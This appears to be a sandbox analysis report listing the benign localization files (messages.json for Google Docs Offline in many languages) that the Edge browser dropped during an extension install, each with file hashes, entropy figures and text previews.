Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
